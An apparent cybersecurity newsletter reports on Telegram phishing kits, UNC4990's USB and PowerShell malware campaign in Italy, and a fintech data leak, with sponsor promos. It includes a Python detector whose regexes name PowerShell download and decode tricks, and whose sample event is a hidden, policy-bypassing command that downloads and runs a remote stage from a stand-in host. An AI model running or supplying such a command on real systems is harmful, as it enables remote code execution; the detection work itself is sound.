Phishing Alert: Telegram Transforms into Cybercrime Hub

Feb 01 2024


Welcome to Gone Phishing, your daily cybersecurity newsletter that’s giving you more hope than the Fed with rate cuts 💀💀💀

Today’s hottest cybersecurity news stories:

  • 🎺 And the Telegrammy goes to hackers w/ their DIY kits 🔨

  • 🍕 Italians suffer cheesy crypto hack attacks via USB attacks 💾

  • 😳 It’s a data leak anthology of Direct Trading Technologies 👨🏻‍💻s 👊

DIY hack and pry 👀


๐Ÿ” Phishing Alert: Telegram Transforms into Cybercrime Hub! ๐Ÿšจ

๐Ÿ“ข Cybersecurity researchers from Guardio Labs have uncovered a concerning trend in the world of cybercrimeโ€”the “democratisation” of the phishing ecosystem through Telegram. This messaging app, priced as low as $230, has become a thriving hub for cybercriminals, allowing both seasoned and novice actors to exchange tools and insights, creating a dark supply chain.

๐ŸŒ The once-invite-only dark web activities are now easily accessible on public Telegram channels, exposing aspiring cybercriminals to malicious tools and tactics. Guardio Labs warns of the ease with which phishing campaigns can be constructed using affordable tools and kits available on the platform.

๐Ÿ“… In April 2023, Kaspersky reported on Telegram channels educating newcomers about phishing, offering automated bots like Telekopye for large-scale scams. Guardio Labs emphasises the dual responsibility of website owners to protect against scammers exploiting their platforms for phishing operations.

๐Ÿ“ง Digital marketplaces on Telegram provide “letters”โ€”expertly designed email templatesโ€”enhancing the authenticity of phishing campaigns. Additionally, bulk datasets or “leads” with personal information are available to maximise attack effectiveness.

๐Ÿ’ฐ These phishing campaigns aim to monetize stolen credentials by selling them as “logs,” yielding a significant return on investment. Social media credentials sell for as little as a dollar, while banking details can fetch hundreds.

๐Ÿ›ก๏ธ Guardio Labs underscores the alarming accessibility of cybercrime, urging vigilance and protection against unwitting involvement in phishing operations. Stay informed, stay secure! ๐Ÿ”’๐Ÿ”๐ŸŒ๐Ÿšซ


USB TBD TCA BTW 😁

🚨 Alert: UNC4990 Targets Italian Organisations with USB Attacks! 💻

🌐 Mandiant, a subsidiary of Google, has identified a financially motivated threat actor, UNC4990, utilising weaponised USB devices to infiltrate organisations in Italy. This threat spans various sectors, including health, transportation, construction, and logistics.

🔍 UNC4990’s modus operandi involves widespread USB infections, deploying the EMPTYSPACE downloader. The attacks leverage third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded stages, downloaded and decoded via PowerShell in the execution chain.

📆 Active since late 2020, UNC4990 predominantly operates from Italy, utilising Italian infrastructure for command-and-control (C2) functions. The end goal remains unclear, though instances of deploying an open-source cryptocurrency miner have been reported after prolonged beaconing activity.

🛡️ The infection initiates with a victim clicking on a malicious LNK shortcut file on a USB device, triggering a PowerShell script to download EMPTYSPACE from a remote server. Yoroi identifies four EMPTYSPACE variants (Golang, .NET, Node.js, Python), acting as conduits for fetching next-stage payloads from the C2 server, including the QUIETBOARD backdoor.

👾 QUIETBOARD, a Python-based backdoor, exhibits versatile capabilities, executing commands, altering crypto wallet addresses, spreading through removable drives, taking screenshots, and gathering system information. Notably, UNC4990 utilises popular sites like Ars Technica and GitHub for hosting malicious payloads.

🚫 While content hosted on these services poses no direct risk to users, vigilance is crucial. UNC4990’s modular approach, using multiple programming languages, suggests adaptability and experimentation, posing a persistent threat.

🔒 Stay informed, enhance security measures! 🌐🔐
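The chain described above (a shortcut on a removable drive launching PowerShell, which then pulls an encoded stage from a web host) is the kind of sequence that process-creation telemetry can surface. The Python below is an added example, not code from Mandiant, Yoroi or the newsletter: it scores Sysmon-style process events with a small heuristic over constructed sample records, and the field names, the traits and the cut-off are assumptions of this example.

```python
"""Heuristic detector for the USB-shortcut-to-PowerShell download chain.

A double-click on a shortcut shows up as explorer.exe spawning powershell.exe,
a removable drive as a non-system working directory, and the stage fetch as a
download or decode primitive on the command line. Field names are assumptions.
"""
import re

# Cmdlets and switches used to pull or unpack a remote stage.
DOWNLOAD_PRIMITIVES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression"
    r"|\biex\b|-EncodedCommand|-enc\b|FromBase64String", re.IGNORECASE)
# Flags a shortcut meant for a user has no honest reason to pass.
EVASION_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-nop\b", re.IGNORECASE)
SYSTEM_DRIVE = "C:"

def score_event(ev):
    """Return (score, reasons) for one event; each matched trait adds one."""
    reasons = []
    if "powershell" not in ev["image"].lower():
        return 0, reasons
    if ev["parent_image"].lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (shortcut launch)")
    drive = ev.get("current_directory", "")[:2].upper()
    if drive and drive != SYSTEM_DRIVE:
        reasons.append(f"working directory on non-system drive {drive}")
    if DOWNLOAD_PRIMITIVES.search(ev["command_line"]):
        reasons.append("download/decode primitive in command line")
    if EVASION_FLAGS.search(ev["command_line"]):
        reasons.append("hidden window or execution-policy bypass flag")
    return len(reasons), reasons

def find_suspicious(events, threshold=3):
    """Events scoring at or above threshold, with the reasons that fired."""
    return [{"command_line": ev["command_line"], "score": s, "reasons": r}
            for ev in events for s, r in [score_event(ev)] if s >= threshold]

# Constructed sample events, not telemetry from the campaign described above.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent_image": "C:\\Windows\\explorer.exe", "current_directory": "E:\\",
     "command_line": 'powershell.exe -w hidden -ep bypass -c "iex (New-Object Net.WebClient)'
                     ".DownloadString('https://example.invalid/stage1')\""},
    {"image": PS, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "current_directory": "C:\\Users\\admin", "command_line": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"image": PS, "parent_image": "C:\\Windows\\explorer.exe",
     "current_directory": "C:\\Users\\dev", "command_line": "powershell.exe"},
]
```

Only the first sample record (explorer.exe parent, working directory on E:, download cmdlet plus hidden-window and bypass flags) reaches the default cut-off; the scheduled backup and the plain interactive shell do not.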

🎣 Catch of the Day!! 🌊🐟🦞

🃏 The Motley Fool: “Fool me once, shame on — shame on you. Fool me — you can’t get fooled again.” Good ol’ George Dubya 😂 Let us tell you who’s not fooling around though; that’s the Crüe 👀 at Motley Fool. You’d be a fool (alright, enough already! 🙈) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! 🐛 Kidding aside, if you check out their website they’ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets 🤑 (LINK)

🚵 Wander: Find your happy place. Cue Happy Gilmore flashback 🏌️⛳🌈🕊️ Mmmm Happy Place… 😇 So, we’ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breathtaking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the Free and the Home of the Brave is news of rioting, looting and school shootings, it’s easy to forget how beautiful some parts of it are. The awe-inspiring locations, along with the innovative architecture of the hotels, set Wander apart from your run-of-the-mill American getaway 🏞️😍 (LINK)

🌊 Digital Ocean: If you build it they will come. Nope, we’re not talking about a baseball field for ghosts ⚾👻🍿 (Great movie, to be fair 🙈). This is the Digital Ocean who’ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website you’ll find yourself catching the buzz even if you can’t code (guilty 😑). But if you can and you’re looking for somewhere to test things out or launch something new or simply enhance what you’ve got, we’d recommend checking out their services fo’ sho 😉 And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! 🌿 (LINK)

You better Fintech yourself before you wreck yo’ self 🎤🎵🔥

🚨 Security Breach Alert: Fintech Firm Leaks Data of 300K+ Traders! 💳

📢 International fintech company Direct Trading Technologies (DTT) is under scrutiny after it inadvertently exposed the sensitive data and trading activity of over 300,000 traders, putting them at risk of account takeovers. On October 27th, Cybernews discovered a misconfigured web server belonging to DTT that contained backups and development code references.

🌐 DTT, operating globally with a focus on Saudi Arabia, offers trading platforms for various assets, including stocks, forex, metals, energies, indices, CFDs, and cryptocurrencies. The leaked directory included database backups with extensive information on users, posing risks from identity theft to account manipulation.

💻 Leaked Data Highlights:

  • Trading activity of 300K+ users over six years

  • Names, email addresses, and IP addresses

  • Exposed passwords for users with DTT email addresses

  • Home addresses, phone numbers, and partial credit card details

  • Hashed passwords for DTT trading platform access

  • KYC document storage locations and metadata (documents not exposed)

  • Database credentials and white-label customer details in plaintext

🔍 Cybernews promptly notified DTT, and while the issue was resolved, an official response is pending. The leaked information, including internal comments from the outreach team, raises concerns about potential financial account takeovers.

📉 This breach underscores the urgency for robust cybersecurity in the rapidly growing fintech industry. Traders, holding accounts with substantial value, become prime targets for threat actors. Stay vigilant and informed to protect your financial data! 🌐🔒

That’s all for today, cyber tigers 🐯

🗞️ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3-minute newsletter on what matters in AI; with all the new AI things coming to market, it’s good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20-year veteran ‘Wealthy Primate’ might be able to help you climb that tree 🐒🌴 with his stick and banana approach 🍌😁

  • Techspresso: Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, TechCrunch etc.)

So long and thanks for reading all the phish!